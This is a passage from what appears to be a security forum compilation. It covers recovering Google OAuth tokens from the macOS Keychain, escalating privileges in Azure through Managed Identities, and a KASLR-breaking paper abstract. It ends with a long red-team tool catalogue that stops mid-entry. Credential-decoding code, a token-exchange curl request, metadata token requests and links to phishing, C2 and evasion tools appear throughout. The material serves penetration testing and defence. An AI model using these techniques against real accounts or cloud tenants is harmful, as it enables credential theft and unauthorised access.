method: def LoadOAuthToken(user_email, token_storage_instance, http_client): if user_email is None: return else: try: token_blob = token_storage_instance.FindToken(user_email) if token_blob is not None: return oauth2_token.GoogleDriveOAuth2Token.FromBlob(http_client, token_blob) Taking a look at the oauth2_toke.GoogleDriveOAuth2Token.FromBlob method we can see what’s going on: @staticmethod def FromBlob(http_client, blob): if not blob.startswith(GoogleDriveOAuth2Token._BLOB_PREFIX): raise OAuth2BlobParseError('Wrong prefix for blob %s' % blob) parts = blob[len(GoogleDriveOAuth2Token._BLOB_PREFIX):].split('|') if len(parts) != 4: raise OAuth2BlobParseError('Wrong parts count blob %s' % blob) refresh_token, client_id, client_secret, scope_blob = (base64.b64decode(s) for s in parts) Essentially, the blob that we recovered from the Keychain is a base64 copy of the refresh token, client_id and client_secret amongst other things. We can recover these using: import base64 _BLOB_PREFIX = '2G' blob = ‘2GXXXXXXXXXXXXX|YYYYYYYYYYYYYY|ZZZZZZZZZZZ|AAAAAAAAAA=' parts = blob[len(_BLOB_PREFIX):].split('|') refresh_token, client_id, client_secret, scope_blob = (base64.b64decode(s) for s in parts) print(refresh_token) print(client_id) print(client_secret) The refresh token can then be used to request a new access token to provide access to the Google account as the user: $ curl https://www.googleapis.com/oauth2/v4/token \ -d client_id=11111111111.apps.googleusercontent.com \ -d client_secret=XXXXXXXXXXXXX \ -d refresh_token=‘1/YYYYYYYYYYYYY' \ -d grant_type=refresh_token { "access_token": “xxxxx.aaaaa.bbbbb.ccccc", "expires_in": 3599, "scope": "https://www.googleapis.com/auth/googletalk https://www.googleapis.com/auth/drive https://www.googleapis.com/auth/peopleapi.readonly https://www.googleapis.com/auth/contactstore.readonly", "token_type": "Bearer" } Conclusions During this research, we reviewed how operators can recover credentials from a MacOS device’s Keychain without elevation, by abusing code injection to surrogate applications. While Apple provides some protections to limit code injection, these are not always fully effective when leveraging a surrogate application that already has the necessary entitlements to access stored resources. We’ll cover this and more MacOS tradecraft in our upcoming Adversary Simulation and Red Team Tactics training at Blackhat USA. This blog post was written by Dominic Chell. Sursa: https://www.mdsec.co.uk/2020/02/getting-what-youre-entitled-to-a-journey-in-to-macos-stored-credentials/

Azure Privilege Escalation Using Managed Identities Karl Fosaaen February 20th, 2020 Azure Managed Identities are Azure AD objects that allow Azure virtual machines to act as users in an Azure subscription. While this may sound like a bad idea, AWS utilizes IAM instance profiles for EC2 and Lambda execution roles to accomplish very similar results, so it’s not an uncommon practice across cloud providers. In my experience, they are not as commonly used as AWS EC2 roles, but Azure Managed Identities may be a potential option for privilege escalation in an Azure subscription. TL;DR – Managed Identities on Azure VMs can be given excessive Azure permissions. Access to these VMs could lead to privilege escalation. Much like other Azure AD objects, these managed identities can be granted IAM permissions for specific resources in the subscription (storage accounts, databases, etc.) or they can be given subscription level permissions (Reader, Contributor, Owner). If the identity is given a role (Contributor, Owner, etc.) or privileges higher than those granted to the users with access to the VM, users should be able to escalate privileges from the virtual machine. Important note: Anyone with command execution rights on a Virtual Machine (VM), that has a Managed Identity, can execute commands as that managed identity from the VM. Here are some potential scenarios that could result in command execution rights on an Azure VM: Domain/Local user logins (RDP, PS Remoting, etc.) Application issues resulting in command execution Patch related issues resulting in command execution Azure IAM “Contributor” permissions on the VM Thick Application Breakouts Identifying Managed Identities In the Azure portal, there are a couple of different places where you will be able to identify managed identities. The first option is the Virtual Machine section. Under each VM, there will be an “Identity” tab that will show the status of that VM’s managed identity. Alternatively, you will be able to note managed identities in any Access Control (IAM) tabs where a managed identity has rights. In this example, the MGITest identity has Owner rights on the resource in question (a subscription). From the AZ CLI – AzureAD User To identify managed identities as an authenticated AzureAD user on the CLI, I normally get a list of the VMs (az vm list) and pipe that into the command to show identities. Here’s the full one-liner that I use (in an authenticated AZ CLI session) to identify managed identities in a subscription. (az vm list | ConvertFrom-Json) | ForEach-Object {$_.name;(az vm identity show --resource-group $_.resourceGroup --name $_.name | ConvertFrom-Json)} Since the principalId (a GUID) isn’t the easiest thing to use to identify the specific managed identity, I print the VM name ($_.name) first to help figure out which VM (MGITest) owns the identity. From the AZ CLI – On the VM Let’s assume that you have a session (RDP, PS Remoting, etc.) on the Azure VM and you want to check if the VM has a managed identity. If the AZ CLI is installed, you can use the “az login –identity” command to authenticate as the VM to the CLI. If this is successful, you have confirmed that you have access to a Managed Identity. From here, your best bet is to list out your permissions for the current subscription: az role assignment list -–assignee ((az account list | ConvertFrom-Json).id) Alternatively, you can enumerate through other resources in the subscription and check your rights on those IDs/Resource Groups/etc: az resource list az role assignment list --scope "/subscriptions/SUB_ID_GOES_HERE/PATH_TO_RESOURCE_GROUP/OR_RESOURCE_PATH" From the Azure Metadata Service If you don’t have the AZ CLI on the VM that you have access to, you can still use PowerShell to make calls out to the Azure AD OAuth token service to get a token to use with the Azure REST APIs. While it’s not as handy as the AZ CLI, it may be your only option. To do this, invoke a web request to 169.254.169.254 for the oauth2 API with the following command: Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing If this returns an actual token, then you have a Managed Identity to work with. This token can then be used with the REST APIs to take actions in Azure. A simple proof of concept for this is included in the demo section below. You can think of this method as similar to gathering AWS credentials from the metadata service from an EC2 host. Plenty has been written on that subject, but here’s a good primer blog for further reading. Limitations Microsoft does limit the specific services that accept managed identities as authentication – Microsoft Documentation Page Due to the current service limitations, the escalation options can be a bit limited, but you should have some options. Privilege Escalation Once we have access to a Managed Identity, and have confirmed the rights of that identity, then we can start escalating our privileges. Below are a few scenarios (descending by level of permissions) that you may find yourself in with a Managed Identity. Identity is a Subscription Owner Add a guest account to the subscription Add that guest as an Owner Add an existing domain user to the subscription as an Owner See the demo below Identity is a Subscription Contributor Virtual Machine Lateral Movement Managed Identity can execute commands on another VMs via Azure CLI or APIs Storage Account Access Read files from Storage Accounts See Cloud Shell Privilege Escalation Configuration Access Dump configuration information for services containing credentials See Get-AzurePasswords Identity has rights to other subscriptions Pivot to other subscription, evaluate permissions Identity has access to Key Vaults Query Key Vaults for credential and secrets data Local admin creds Domain creds See related Automation Account Scenario Identity is a Subscription Reader Subscription Information Enumeration List out available resources, users, etc for further use in privilege escalation For more information on Azure privilege escalation techniques, check out my DerbyCon 9 talk: Secondary Access Scenarios You may not always have direct command execution on a virtual machine, but you may be able to indirectly run commands via Automation Account Runbooks. I have seen subscriptions where a user does not have contributor (or command execution) rights on a VM, but they have Runbook creation and run rights on an Automation account. This automation account has subscription contributor rights, which allows the lesser privileged user to run commands on the VM through the Runbook. While this in itself is a privilege inheritance issue (See previous Key Vault blog), it can be abused by the previously outlined process to escalate privileges on the subscription. Proof of Concept Code Below is a basic PowerShell proof of concept that uses the Azure REST APIs to add a specific user to the subscription Owners group using a Managed Identity. Proof of Concept Code Sample All the code is commented, but the overall script process is as follows: Query the metadata service for the subscription ID Request an OAuth token from the metadata service Query the REST APIs for a list of roles, and find the subscription “Owner” GUID Add a specific user (see below) to the subscription “Owners” IAM role The provided code sample can be modified (See: “CHANGE-ME-TO-AN-ID”) to add a specific ID to the subscription Owners group. While this is a little difficult to demo, we can see in the screen shot below that a new principal ID (starting with 64) was added to the owners group as part of the script execution. Conclusion I have been in a fair number of Azure environments and can say that managed identities are not heavily used. But if a VM is configured with an overly permissive Managed Identity, this might be a handy way to escalate. I have actually seen this exact scenario (Managed Identity as an Owner) in a client environment, so it does happen. From a permissions management perspective, you may have a valid reason for using managed identities, but double check how this identity might be misused by anyone with access (intentional or not) to the system. Sursa: https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/

ABSTRACTIn this paper, we analyze the hardware-based Meltdown mitigationsin recent Intel microarchitectures, revealing that illegally accesseddata is only zeroed out. Hence, while non-present loads stall theCPU, illegal loads are still executed. We present EchoLoad, a noveltechnique to distinguish load stalls from transiently executed loads.EchoLoad allows detecting physically-backed addresses from un-privileged applications, breaking KASLR in40μson the newestMeltdown- and MDS-resistant Cascade Lake microarchitecture. AsEchoLoad only relies on memory loads, it runs in highly-restrictedenvironments, e.g., SGX or JavaScript, making it the first JavaScript-based KASLR break. Based on EchoLoad, we demonstrate the firstproof-of-concept Meltdown attack from JavaScript on systems thatare still broadly not patched against Meltdown,i.e., 32-bit x86 OSs.We propose FLARE, a generic mitigation against known microar-chitectural KASLR breaks with negligible overhead. By mappingunused kernel addresses to a reserved page and mirroring neigh-boring permission bits, we make used and unused kernel memoryindistinguishable,i.e., a uniform behavior across the entire kerneladdress space, mitigating the root cause behind microarchitecturalKASLR breaks. With incomplete hardware mitigations, we proposeto deploy FLARE even on recent CPUs. Sursa: http://cc0x1f.net/publications/kaslr.pdf

Join Pranav for “Hacking OAuth 2.0 For Fun And Profit” – Methods to find high-impact bugs in OAuth 2.0 integrations. Have a question? Post it on our forum: https://forum.bugcrowd.com/t/levelup-...

Red Teaming Toolkit Collection Red Teaming/Adversary Simulation Toolkit Reconnaissance Weaponization Delivery Command and Control Lateral Movement Establish Foothold Escalate Privileges Data Exfiltration Misc References Reconnaissance Active Intelligence Gathering EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible. https://github.com/ChrisTruncer/EyeWitness AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for loot. https://github.com/jordanpotti/AWSBucketDump AQUATONE is a set of tools for performing reconnaissance on domain names. https://github.com/michenriksen/aquatone spoofcheck a program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing. https://github.com/BishopFox/spoofcheck Nmap is used to discover hosts and services on a computer network, thus building a "map" of the network. https://github.com/nmap/nmap dnsrecon a tool DNS Enumeration Script. https://github.com/darkoperator/dnsrecon Passive Intelligence Gathering Social Mapper OSINT Social Media Mapping Tool, takes a list of names & images (or LinkedIn company name) and performs automated target searching on a huge scale across multiple social media sites. Not restricted by APIs as it instruments a browser using Selenium. Outputs reports to aid in correlating targets across sites. https://github.com/SpiderLabs/social_mapper skiptracer OSINT scraping framework, utilizes some basic python webscraping (BeautifulSoup) of PII paywall sites to compile passive information on a target on a ramen noodle budget. https://github.com/xillwillx/skiptracer ScrapedIn a tool to scrape LinkedIn without API restrictions for data reconnaissance. https://github.com/dchrastil/ScrapedIn linkScrape A LinkedIn user/company enumeration tool. https://github.com/NickSanzotta/linkScrape FOCA (Fingerprinting Organizations with Collected Archives) is a tool used mainly to find metadata and hidden information in the documents its scans. https://github.com/ElevenPaths/FOCA theHarvester is a tool for gathering subdomain names, e-mail addresses, virtual hosts, open ports/ banners, and employee names from different public sources. https://github.com/laramies/theHarvester Metagoofil is a tool for extracting metadata of public documents (pdf,doc,xls,ppt,etc) availables in the target websites. https://github.com/laramies/metagoofil SimplyEmail Email recon made fast and easy, with a framework to build on. https://github.com/killswitch-GUI/SimplyEmail truffleHog searches through git repositories for secrets, digging deep into commit history and branches.https://github.com/dxa4481/truffleHog Just-Metadata is a tool that gathers and analyzes metadata about IP addresses. It attempts to find relationships between systems within a large dataset. https://github.com/ChrisTruncer/Just-Metadata typofinder a finder of domain typos showing country of IP address. https://github.com/nccgroup/typofinder pwnedOrNot is a python script which checks if the email account has been compromised in a data breach, if the email account is compromised it proceeds to find passwords for the compromised account. https://github.com/thewhiteh4t/pwnedOrNot GitHarvester This tool is used for harvesting information from GitHub like google dork. https://github.com/metac0rtex/GitHarvester pwndb is a python command-line tool for searching leaked credentials using the Onion service with the same name. https://github.com/davidtavarez/pwndb/ Frameworks Maltego is a unique platform developed to deliver a clear threat picture to the environment that an organization owns and operates. https://www.paterva.com/web7/downloads.php SpiderFoot the open source footprinting and intelligence-gathering tool. https://github.com/smicallef/spiderfoot datasploit is an OSINT Framework to perform various recon techniques on Companies, People, Phone Number, Bitcoin Addresses, etc., aggregate all the raw data, and give data in multiple formats. https://github.com/DataSploit/datasploit Recon-ng is a full-featured Web Reconnaissance framework written in Python. https://bitbucket.org/LaNMaSteR53/recon-ng Weaponization Composite Moniker Proof of Concept exploit for CVE-2017-8570. https://github.com/rxwx/CVE-2017-8570 Exploit toolkit CVE-2017-8759 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft .NET Framework RCE. https://github.com/bhdresh/CVE-2017-8759 CVE-2017-11882 Exploit accepts over 17k bytes long command/code in maximum. https://github.com/unamer/CVE-2017-11882 Adobe Flash Exploit CVE-2018-4878. https://github.com/anbai-inc/CVE-2018-4878 Exploit toolkit CVE-2017-0199 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. https://github.com/bhdresh/CVE-2017-0199 demiguise is a HTA encryption tool for RedTeams. https://github.com/nccgroup/demiguise Office-DDE-Payloads collection of scripts and templates to generate Office documents embedded with the DDE, macro-less command execution technique. https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads CACTUSTORCH Payload Generation for Adversary Simulations. https://github.com/mdsecactivebreach/CACTUSTORCH SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. https://github.com/mdsecactivebreach/SharpShooter Don't kill my cat is a tool that generates obfuscated shellcode that is stored inside of polyglot images. The image is 100% valid and also 100% valid shellcode. https://github.com/Mr-Un1k0d3r/DKMC Malicious Macro Generator Utility Simple utility design to generate obfuscated macro that also include a AV / Sandboxes escape mechanism. https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator SCT Obfuscator Cobalt Strike SCT payload obfuscator. https://github.com/Mr-Un1k0d3r/SCT-obfuscator Invoke-Obfuscation PowerShell Obfuscator. https://github.com/danielbohannon/Invoke-Obfuscation Invoke-CradleCrafter PowerShell remote download cradle generator and obfuscator. https://github.com/danielbohannon/Invoke-CradleCrafter Invoke-DOSfuscation cmd.exe Command Obfuscation Generator & Detection Test Harness. https://github.com/danielbohannon/Invoke-DOSfuscation morphHTA Morphing Cobalt Strike's evil.HTA. https://github.com/vysec/morphHTA Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. https://github.com/trustedsec/unicorn Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created. https://www.shellterproject.com/ EmbedInHTML Embed and hide any file in an HTML file. https://github.com/Arno0x/EmbedInHTML SigThief Stealing Signatures and Making One Invalid Signature at a Time. https://github.com/secretsquirrel/SigThief Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions. https://github.com/Veil-Framework/Veil CheckPlease Sandbox evasion modules written in PowerShell, Python, Go, Ruby, C, C#, Perl, and Rust. https://github.com/Arvanaghi/CheckPlease Invoke-PSImage is a tool to embeded a PowerShell script in the pixels of a PNG file and generates a oneliner to execute. https://github.com/peewpw/Invoke-PSImage LuckyStrike a PowerShell based utility for the creation of malicious Office macro documents. To be used for pentesting or educational purposes only. https://github.com/curi0usJack/luckystrike ClickOnceGenerator Quick Malicious ClickOnceGenerator for Red Team. The default application a simple WebBrowser widget that point to a website of your choice. https://github.com/Mr-Un1k0d3r/ClickOnceGenerator macro_pack is a tool by @EmericNasi used to automatize obfuscation and generation of MS Office documents, VB scripts, and other formats for pentest, demo, and social engineering assessments. https://github.com/sevagas/macro_pack StarFighters a JavaScript and VBScript Based Empire Launcher. https://github.com/Cn33liz/StarFighters nps_payload this script will generate payloads for basic intrusion detection avoidance. It utilizes publicly demonstrated techniques from several different sources. https://github.com/trustedsec/nps_payload SocialEngineeringPayloads a collection of social engineering tricks and payloads being used for credential theft and spear phishing attacks. https://github.com/bhdresh/SocialEngineeringPayloads The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. https://github.com/trustedsec/social-engineer-toolkit Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication.https://github.com/ryhanson/phishery PowerShdll run PowerShell with rundll32. Bypass software restrictions. https://github.com/p3nt4/PowerShdll Ultimate AppLocker ByPass List The goal of this repository is to document the most common techniques to bypass AppLocker. https://github.com/api0cradle/UltimateAppLockerByPassList Ruler is a tool that allows you to interact with Exchange servers remotely, through either the MAPI/HTTP or RPC/HTTP protocol. https://github.com/sensepost/ruler Generate-Macro is a standalone PowerShell script that will generate a malicious Microsoft Office document with a specified payload and persistence method. https://github.com/enigma0x3/Generate-Macro Malicious Macro MSBuild Generator Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass. https://github.com/infosecn1nja/MaliciousMacroMSBuild Meta Twin is designed as a file resource cloner. Metadata, including digital signature, is extracted from one file and injected into another. https://github.com/threatexpress/metatwin WePWNise generates architecture independent VBA code to be used in Office documents or templates and automates bypassing application control and exploit mitigation software. https://github.com/mwrlabs/wePWNise DotNetToJScript a tool to create a JScript file which loads a .NET v2 assembly from memory. https://github.com/tyranid/DotNetToJScript PSAmsi is a tool for auditing and defeating AMSI signatures. https://github.com/cobbr/PSAmsi Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. https://github.com/stephenfewer/ReflectiveDLLInjection ps1encode use to generate and encode a powershell based metasploit payloads. https://github.com/CroweCybersecurity/ps1encode Worse PDF turn a normal PDF file into malicious. Use to steal Net-NTLM Hashes from windows machines. https://github.com/3gstudent/Worse-PDF SpookFlare has a different perspective to bypass security measures and it gives you the opportunity to bypass the endpoint countermeasures at the client-side detection and network-side detection. https://github.com/hlldz/SpookFlare GreatSCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team. https://github.com/GreatSCT/GreatSCT nps running powershell without powershell. https://github.com/Ben0xA/nps Meterpreter_Paranoid_Mode.sh allows users to secure your staged/stageless connection for Meterpreter by having it check the certificate of the handler it is connecting to. https://github.com/r00t-3xp10it/Meterpreter_Paranoid_Mode-SSL The Backdoor Factory (BDF) is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state. https://github.com/secretsquirrel/the-backdoor-factory MacroShop a collection of scripts to aid in delivering payloads via Office Macros. https://github.com/khr0x40sh/MacroShop UnmanagedPowerShell Executes PowerShell from an unmanaged process. https://github.com/leechristensen/UnmanagedPowerShell evil-ssdp Spoof SSDP replies to phish for NTLM hashes on a network. Creates a fake UPNP device, tricking users into visiting a malicious phishing page. https://gitlab.com/initstring/evil-ssdp Ebowla Framework for Making Environmental Keyed Payloads. https://github.com/Genetic-Malware/Ebowla make-pdf-embedded a tool to create a PDF document with an embedded file. https://github.com/DidierStevens/DidierStevensSuite/blob/master/make-pdf-embedded.py avet (AntiVirusEvasionTool) is targeting windows machines with executable files using different evasion techniques. https://github.com/govolution/avet Delivery Phishing King Phisher is a tool for testing and promoting user awareness by simulating real world phishing attacks. https://github.com/securestate/king-phisher FiercePhish is a full-fledged phishing framework to manage all phishing engagements. It allows you to track separate phishing campaigns, schedule sending of emails, and much more. https://github.com/Raikia/FiercePhish ReelPhish is a Real-Time Two-Factor Phishing Tool. https://github.com/fireeye/ReelPhish/ Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training. https://github.com/gophish/gophish CredSniper is a phishing framework written with the Python micro-framework Flask and Jinja2 templating which supports capturing 2FA tokens. https://github.com/ustayready/CredSniper PwnAuth a web application framework for launching and managing OAuth abuse campaigns. https://github.com/fireeye/PwnAuth Phishing Frenzy Ruby on Rails Phishing Framework. https://github.com/pentestgeek/phishing-frenzy Phishing Pretexts a library of pretexts to use on offensive phishing engagements. https://github.com/L4bF0x/PhishingPretexts *Modlishka is a flexible and powerful reverse proxy, that will take your ethical phishing campaigns to the next level. https://github.com/drk1wi/Modlishka Watering Hole Attack BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. https://github.com/beefproject/beef Command and Control Remote Access Tools Cobalt Strike is software for Adversary Simulations and Red Team Operations. https://cobaltstrike.com/ Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent. https://github.com/EmpireProject/Empire Metasploit Framework is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. https://github.com/rapid7/metasploit-framework SILENTTRINITY A post-exploitation agent powered by Python, IronPython, C#/.NET. https://github.com/byt3bl33d3r/SILENTTRINITY Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python. https://github.com/n1nj4sec/pupy Koadic or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. https://github.com/zerosum0x0/koadic PoshC2 is a proxy aware C2 framework written completely in PowerShell to aid penetration testers with red teaming, post-exploitation and lateral movement. https://github.com/nettitude/PoshC2 Gcat a stealthy Python based backdoor that uses Gmail as a command and control server. https://github.com/byt3bl33d3r/gcat TrevorC2 is a legitimate website (browsable) that tunnels client/server communications for covert command execution. https://github.com/trustedsec/trevorc2 Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang. https://github.com/Ne0nd0g/merlin Quasar is a fast and light-weight remote administration tool coded in C#. Providing high stability and an easy-to-use user interface, Quasar is the perfect remote administration solution for you. https://github.com/quasar/QuasarRAT Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers. https://github.com/cobbr/Covenant FactionC2 is a C2 framework which use websockets based API that allows for interacting with agents and transports. https://github.com/FactionC2/ DNScat2 is a tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol. https://github.com/iagox86/dnscat2 Staging Rapid Attack Infrastructure (RAI) Red Team Infrastructure... Quick... Fast... Simplified One of the most tedious phases of a Red Team Operation is usually the infrastructure setup. This usually entails a teamserver or controller, domains, redirectors, and a Phishing server. https://github.com/obscuritylabs/RAI Red Baron is a set of modules and custom/third-party providers for Terraform which tries to automate creating resilient, disposable, secure and agile infrastructure for Red Teams. https://github.com/byt3bl33d3r/Red-Baron EvilURL generate unicode evil domains for IDN Homograph Attack and detect them. https://github.com/UndeadSec/EvilURL Domain Hunter checks expired domains, bluecoat categorization, and Archive.org history to determine good candidates for phishing and C2 domain names. https://github.com/threatexpress/domainhunter PowerDNS is a simple proof of concept to demonstrate the execution of PowerShell script using DNS only. https://github.com/mdsecactivebreach/PowerDNS Chameleon a tool for evading Proxy categorisation. https://github.com/mdsecactivebreach/Chameleon CatMyFish Search for categorized domain that can be used during red teaming engagement. Perfect to setup whitelisted domain for your Cobalt Strike beacon C&C. https://github.com/Mr-Un1k0d3r/CatMyFish Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. https://github.com/rsmudge/Malleable-C2-Profiles Malleable-C2-Randomizer This script randomizes Cobalt Strike Malleable C2 profiles through the use of a metalanguage, hopefully reducing the chances of flagging signature-based detection controls. https://github.com/bluscreenofjeff/Malleable-C2-Randomizer FindFrontableDomains search for potential frontable domains. https://github.com/rvrsh3ll/FindFrontableDomains Postfix-Server-Setup Setting up a phishing server is a very long and tedious process. It can take hours to setup, and can be compromised in minutes. https://github.com/n0pe-sled/Postfix-Server-Setup DomainFrontingLists a list of Domain Frontable Domains by CDN. https://github.com/vysec/DomainFrontingLists Apache2-Mod-Rewrite-Setup Quickly Implement Mod-Rewrite in your infastructure. https://github.com/n0pe-sled/Apache2-Mod-Rewrite-Setup mod_rewrite rule to evade vendor sandboxes. https://gist.github.com/curi0usJack/971385e8334e189d93a6cb4671238b10 external_c2 framework a python framework for usage with Cobalt Strike's External C2. https://github.com/Und3rf10w/external_c2_framework ExternalC2 a library for integrating communication channels with the Cobalt Strike External C2 server. https://github.com/ryhanson/ExternalC2 cs2modrewrite a tools for convert Cobalt Strike profiles to modrewrite scripts. https://github.com/threatexpress/cs2modrewrite e2modrewrite a tools for convert Empire profiles to Apache modrewrite scripts. https://github.com/infosecn1nja/e2modrewrite redi automated script for setting up CobaltStrike redirectors (nginx reverse proxy, letsencrypt). https://github.com/taherio/redi cat-sites Library of sites for categorization. https://github.com/audrummer15/cat-sites now-you-see-me Pass-thru web server for traffic redirection. https://github.com/audrummer15/now-you-see-me Domain Fronting Google App Engine. https://github.com/redteam-cyberark/Google-Domain-fronting DomainFrontDiscover Scripts and results for finding domain frontable CloudFront domains. https://github.com/peewpw/DomainFrontDiscover Automated Empire Infrastructure https://github.com/bneg/RedTeam-Automation Serving Random Payloads with NGINX. https://gist.github.com/jivoi/a33ace2e25515a31aa2ffbae246d98c9 meek is a blocking-resistant pluggable transport for Tor. It encodes a data stream as a sequence of HTTPS requests and responses. https://github.com/arlolra/meek CobaltStrike-ToolKit Some useful scripts for CobaltStrike. https://github.com/killswitch-GUI/CobaltStrike-ToolKit mkhtaccess_red Auto-generate an HTaccess for payload delivery -- automatically pulls ips/nets/etc from known sandbox companies/sources that have been seen before, and redirects them to a benign payload. https://github.com/violentlydave/mkhtaccess_red RedFile a flask wsgi application that serves files with intelligence, good for serving conditional RedTeam payloads. https://github.com/outflanknl/RedFile keyserver Easily serve HTTP and DNS keys for proper payload protection. https://github.com/leoloobeek/keyserver DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike (https://www.cobaltstrike.com). https://github.com/SpiderLabs/DoHC2 Lateral Movement CrackMapExec is a swiss army knife for pentesting networks. https://github.com/byt3bl33d3r/CrackMapExec PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. https://github.com/Mr-Un1k0d3r/PowerLessShell GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.https://github.com/GoFetchAD/GoFetch ANGRYPUPPY a bloodhound attack path automation in CobaltStrike. https://github.com/vysec/ANGRYPUPPY DeathStar is a Python script that uses Empire's RESTful API to automate gaining Domain Admin rights in Active Directory environments using a variety of techinques. https://github.com/byt3bl33d3r/DeathStar SharpHound C# Rewrite of the BloodHound Ingestor. https://github.com/BloodHoundAD/SharpHound BloodHound.py is a Python based ingestor for BloodHound, based on Impacket. https://github.com/fox-it/BloodHound.py Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. https://github.com/SpiderLabs/Responder SessionGopher is a PowerShell tool that uses WMI to extract saved session information for remote access tools such as WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop. It can be run remotely or locally. https://github.com/fireeye/SessionGopher PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. https://github.com/PowerShellMafia/PowerSploit Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing. https://github.com/samratashok/nishang Inveigh is a Windows PowerShell LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool. https://github.com/Kevin-Robertson/Inveigh PowerUpSQL a PowerShell Toolkit for Attacking SQL Server. https://github.com/NetSPI/PowerUpSQL MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). https://github.com/dafthack/MailSniper WMIOps is a powershell script that uses WMI to perform a variety of actions on hosts, local or remote, within a Windows environment. It's designed primarily for use on penetration tests or red team engagements. https://github.com/ChrisTruncer/WMIOps Mimikatz is an open-source utility that enables the viewing of credential information from the Windows lsass. https://github.com/gentilkiwi/mimikatz LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. https://github.com/AlessandroZ/LaZagne mimipenguin a tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz. https://github.com/huntergregal/mimipenguin PsExec is a light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software. https://docs.microsoft.com/en-us/sysinternals/downloads/psexec KeeThief allows for the extraction of KeePass 2.X key material from memory, as well as the backdooring and enumeration of the KeePass trigger system. https://github.com/HarmJ0y/KeeThief PSAttack combines some of the best projects in the infosec powershell community into a self contained custom PowerShell console. https://github.com/jaredhaight/PSAttack Internal Monologue Attack Retrieving NTLM Hashes without Touching LSASS. https://github.com/eladshamir/Internal-Monologue Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (for instance NMB, SMB1-3 and MS-DCERPC) the protocol implementation itself. https://github.com/CoreSecurity/impacket icebreaker gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment. https://github.com/DanMcInerney/icebreaker Living Off The Land Binaries and Scripts (and now also Libraries) The goal of these lists are to document every binary, script and library that can be used for other purposes than they are designed to. https://github.com/api0cradle/LOLBAS WSUSpendu for compromised WSUS server to extend the compromise to clients. https://github.com/AlsidOfficial/WSUSpendu Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. https://github.com/infobyte/evilgrade NetRipper is a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption. https://github.com/NytroRST/NetRipper LethalHTA Lateral Movement technique using DCOM and HTA. https://github.com/codewhitesec/LethalHTA Invoke-PowerThIEf an Internet Explorer Post Exploitation library. https://github.com/nettitude/Invoke-PowerThIEf RedSnarf is a pen-testing / red-teaming tool for Windows environments. https://github.com/nccgroup/redsnarf HoneypotBuster Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host. https://github.com/JavelinNetworks/HoneypotBuster Establish Foothold Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments. https://github.com/SECFORCE/Tunna reGeorg the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn. https://github.com/sensepost/reGeorg Blade is a webshell connection tool based on console, currently under development and aims to be a choice of replacement of Chooper. https://github.com/wonderqs/Blade TinyShell Web Shell Framework. https://github.com/threatexpress/tinyshell PowerLurk is a PowerShell toolset for building malicious WMI Event 